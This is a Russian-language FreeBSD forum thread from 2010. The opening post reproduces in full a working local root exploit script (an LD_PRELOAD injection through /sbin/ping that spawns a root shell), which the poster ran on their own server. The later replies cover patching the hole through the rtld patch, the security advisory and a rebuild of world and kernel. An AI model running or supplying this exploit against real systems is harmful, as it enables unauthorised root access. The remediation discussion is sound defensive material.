Люди это [censored]!

Разговоры ни о чём

Модератор: vadim64

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 3:50:28

Доброй ночи, прошу меня извинить за не цензуру, я перевозбуждён, но есть причины!
Случайно рылся в инете и нашёл вот это:
http://seclists.org/fulldisclosure/2009/Nov/371
Затем вот это:
http://www.xakep.ru/post/50314/default.asp
Не долго думая, зашёл под самым безобидным пользователем, юзнул этот скрипт:

Код: Выделить всё

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>

main() {
        extern char **environ;
        environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        extern char **environ;
        environ=NULL;
        system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Не потратил больше 15 минут, немного манипуляций с master.passwd и создал нужного пользователя а затем root пароль убрал, и что вы думает захватил свой сервер!
Осталось только одно отшлифовать, найти способ загрузить скрипт и безобидного пользователя, даже не из группы wheel…
Не знаю, возможно многие из вас уже читали об этом, но мне кажется масштаб этого экплоита велик!!! Есть о чём задуматься, я в шоке!!!
Последний раз редактировалось hizel 2010-01-27 8:32:13, всего редактировалось 2 раза.
Причина: Автору, выбирайте пожалуйста раздел соответствуюший тематике вашего сообщения.
Да пребудет с нами сила!!!
Всех убью, один останусь!

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: Люди это пиздец!

Непрочитанное сообщение zg » 2010-01-27 6:18:41

fox писал(а):найти способ загрузить скрипт и безобидного пользователя, даже не из группы wheel…
любой хостинг, хоть платный, хоть бесплатный

стоит, однако, задуматься...

Аватара пользователя
f_andrey
майор
Сообщения: 2651
Зарегистрирован: 2007-12-26 1:22:58
Откуда: СПб
Контактная информация:

Re: Люди это пиздец!

Непрочитанное сообщение f_andrey » 2010-01-27 7:44:44

zg писал(а):стоит, однако, задуматься...
О да это обычно не лишне, только смотрим сначала на название раздела, потом можно еше немного подумать

Ну и мотивационна картинка
Изображение
Если ваша тема перенесена, то смотри http://forum.lissyara.su/viewtopic.php?f=1&t=32308

iye
ст. сержант
Сообщения: 360
Зарегистрирован: 2008-07-29 9:02:04

Re: Люди это пиздец!

Непрочитанное сообщение iye » 2010-01-27 8:29:26

А я почему то всегда думал что шел доступен только на виртуальных машинах... у всех остальных в качестве шела стоит /usr/sbin/nologin а все скрипты выполняются в chroot окружении...

Аватара пользователя
hizel
дядя поня
Сообщения: 9031
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Люди это [censored]!

Непрочитанное сообщение hizel » 2010-01-27 8:33:47

опять хладоген потек? надо быть внимательнее что-ли :pardon:
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.

Аватара пользователя
terminus
майор
Сообщения: 2305
Зарегистрирован: 2007-10-29 11:27:35
Откуда: Рига

Re: Люди это [censored]!

Непрочитанное сообщение terminus » 2010-01-27 8:54:18

[::||||||||/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\||||||||::]
:bn: :bn: :bn:

Код: Выделить всё

November 2009
Модель: AST-PM-105/0044; Тип: Универсальный, ремонтный; Название: Терминус; Род повреждения: Распад функций; Выводы: Сдать на слом.

princeps
майор
Сообщения: 2684
Зарегистрирован: 2007-09-25 10:20:59
Откуда: Сочи, Москва
Контактная информация:

Re: Люди это [censored]!

Непрочитанное сообщение princeps » 2010-01-27 9:48:53

я так понимаю, боян: http://forum.lissyara.su/viewtopic.php?f=46&t=22252
:)
Deus quos vult perdere dementat prius
http://www.itforum-sochi.ru

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 14:22:50

princeps писал(а):я так понимаю, боян: http://forum.lissyara.su/viewtopic.php?f=46&t=22252
:)
Согласен, мне не это важно!
Важно то, как закрыть эту бреш?????
Патчь нужен!!!!
Да пребудет с нами сила!!!
Всех убью, один останусь!

iye
ст. сержант
Сообщения: 360
Зарегистрирован: 2008-07-29 9:02:04

Re: Люди это [censored]!

Непрочитанное сообщение iye » 2010-01-27 14:26:56

По линку пробегала ссылка : http://people.freebsd.org/~cperciva/rtld.patch

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 14:31:41

iye писал(а):По линку пробегала ссылка : http://people.freebsd.org/~cperciva/rtld.patch
Извините за не скромный вопрос, а как им пользоваться?
Не получается...
Да пребудет с нами сила!!!
Всех убью, один останусь!

iye
ст. сержант
Сообщения: 360
Зарегистрирован: 2008-07-29 9:02:04

Re: Люди это [censored]!

Непрочитанное сообщение iye » 2010-01-27 14:43:39

НАмекаю ) Открой ссылку ) Открой )
fox писал(а):
princeps писал(а):я так понимаю, боян: http://forum.lissyara.su/viewtopic.php?f=46&t=22252
:)
Согласен, мне не это важно!
Важно то, как закрыть эту бреш?????
Патчь нужен!!!!

princeps
майор
Сообщения: 2684
Зарегистрирован: 2007-09-25 10:20:59
Откуда: Сочи, Москва
Контактная информация:

Re: Люди это [censored]!

Непрочитанное сообщение princeps » 2010-01-27 14:52:11

fox писал(а):Важно то, как закрыть эту бреш?????Патчь нужен!!!!
Обновиться? Да и подпишись уже на security-advisories, чтобы узнавать о критических уязвимостях не через три месяца :)
Deus quos vult perdere dementat prius
http://www.itforum-sochi.ru

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 14:55:07

iye писал(а):НАмекаю ) Открой ссылку ) Открой )
fox писал(а):
princeps писал(а):я так понимаю, боян: http://forum.lissyara.su/viewtopic.php?f=46&t=22252
:)
Согласен, мне не это важно!
Важно то, как закрыть эту бреш?????
Патчь нужен!!!!
Открыл, но патч не катит, чо то:

Код: Выделить всё

# patch < path.path
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: rtld.c
|===================================================================
|--- rtld.c     (revision 199977)
|+++ rtld.c     (working copy)
--------------------------
File to patch: /usr/src/libexec/rtld-elf/rtld.c
Patching file /usr/src/libexec/rtld-elf/rtld.c using Plan A...
Hunk #1 failed at 366.
1 out of 1 hunks failed--saving rejects to /usr/src/libexec/rtld-elf/rtld.c.rej
Hmm...  Ignoring the trailing garbage.
done
Да пребудет с нами сила!!!
Всех убью, один останусь!

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 14:56:16

princeps писал(а):
fox писал(а):Важно то, как закрыть эту бреш?????Патчь нужен!!!!
Обновиться? Да и подпишись уже на security-advisories, чтобы узнавать о критических уязвимостях не через три месяца :)
А как это сделать? Любезный, не подскажите?
Да пребудет с нами сила!!!
Всех убью, один останусь!

princeps
майор
Сообщения: 2684
Зарегистрирован: 2007-09-25 10:20:59
Откуда: Сочи, Москва
Контактная информация:

Re: Люди это [censored]!

Непрочитанное сообщение princeps » 2010-01-27 15:01:32

ну отчего же не подсказать хорошему человеку: http://lists.freebsd.org/mailman/listin ... ifications
И следи за разделом "новости", там обычно самые важные обновления обсуждаются.
Deus quos vult perdere dementat prius
http://www.itforum-sochi.ru

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 15:04:39

Я пологаю, может быть я не прав, нужно вот по этой ссылке:
http://security.freebsd.org/advisories/ ... 6.rtld.asc
Там есть откуда, что скачать а затем:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/libexec/rtld-elf
# make obj && make depend && make && make install
Так что ли?
Да пребудет с нами сила!!!
Всех убью, один останусь!

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 15:09:22

princeps писал(а):ну отчего же не подсказать хорошему человеку: http://lists.freebsd.org/mailman/listin ... ifications
И следи за разделом "новости", там обычно самые важные обновления обсуждаются.
Спасибо огромное!
Да пребудет с нами сила!!!
Всех убью, один останусь!

iye
ст. сержант
Сообщения: 360
Зарегистрирован: 2008-07-29 9:02:04

Re: Люди это [censored]!

Непрочитанное сообщение iye » 2010-01-27 15:11:53

Думаю стоит попробовать собрать, если соберется отбэкапиться и попробовать проинсталить и посмотреть что получится.

princeps
майор
Сообщения: 2684
Зарегистрирован: 2007-09-25 10:20:59
Откуда: Сочи, Москва
Контактная информация:

Re: Люди это [censored]!

Непрочитанное сообщение princeps » 2010-01-27 15:12:59

fox писал(а):Я пологаю, может быть я не прав, нужно вот по этой ссылке:http://security.freebsd.org/advisories/ ... 6.rtld.ascТам есть откуда, что скачать а затем:
обнови исходники и обнови систему по хэндбуку. и будет тебе счастье. С тех пор, ещё уязвимости были, в январе.
Deus quos vult perdere dementat prius
http://www.itforum-sochi.ru

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 15:20:06

princeps писал(а):
fox писал(а):Я пологаю, может быть я не прав, нужно вот по этой ссылке:http://security.freebsd.org/advisories/ ... 6.rtld.ascТам есть откуда, что скачать а затем:
обнови исходники и обнови систему по хэндбуку. и будет тебе счастье. С тех пор, ещё уязвимости были, в январе.
Так вы предлогаете полность мир пересобрать?
А если мир пересобирать, я извсеняюсь может быть это покажется глупым но боюсь ошибиться, патчить нужно если мир пересобирать, или разработчики уже побеспакоились за меня?
Да пребудет с нами сила!!!
Всех убью, один останусь!

princeps
майор
Сообщения: 2684
Зарегистрирован: 2007-09-25 10:20:59
Откуда: Сочи, Москва
Контактная информация:

Re: Люди это [censored]!

Непрочитанное сообщение princeps » 2010-01-27 15:34:02

fox писал(а): патчить нужно если мир пересобирать,
не нужно. И пересобирать надо не только мир, но и ядро. И обязательно обнови исходники сначала, иначе толку не будет.
Deus quos vult perdere dementat prius
http://www.itforum-sochi.ru

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 15:39:54

princeps писал(а):
fox писал(а): патчить нужно если мир пересобирать,
не нужно. И пересобирать надо не только мир, но и ядро. И обязательно обнови исходники сначала, иначе толку не будет.
Ну это понятно, обновить, а потом полный фарш пересборки всего насвети (мира, ядра)...
Спасибо, за внимание!
Да пребудет с нами сила!!!
Всех убью, один останусь!

Аватара пользователя
fox
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: Люди это [censored]!

Непрочитанное сообщение fox » 2010-01-27 20:29:30

Всё класс, после апгрейда!!!
Получилось, я там ещё нашёл одного эксплоита, тот ядро переполнял, но после апгрейда всё классно, закрыто!
Спасибо всем за участие!
Да пребудет с нами сила!!!
Всех убью, один останусь!

Аватара пользователя
schizoid
подполковник
Сообщения: 3228
Зарегистрирован: 2007-03-03 17:32:31
Откуда: Украина, Чернигов
Контактная информация:

Re: Люди это [censored]!

Непрочитанное сообщение schizoid » 2010-01-28 12:43:01

а что freebsd-update fetch не проканает разве? или по-любому мир/ядро пересобирать?
ядерный взрыв...смертельно красиво...жаль, что не вечно...

princeps
майор
Сообщения: 2684
Зарегистрирован: 2007-09-25 10:20:59
Откуда: Сочи, Москва
Контактная информация:

Re: Люди это [censored]!

Непрочитанное сообщение princeps » 2010-01-28 12:46:18

проканает, наверное, почему не проканать? я пересобираю, мне это как-то надёжнее кажется.
Deus quos vult perdere dementat prius
http://www.itforum-sochi.ru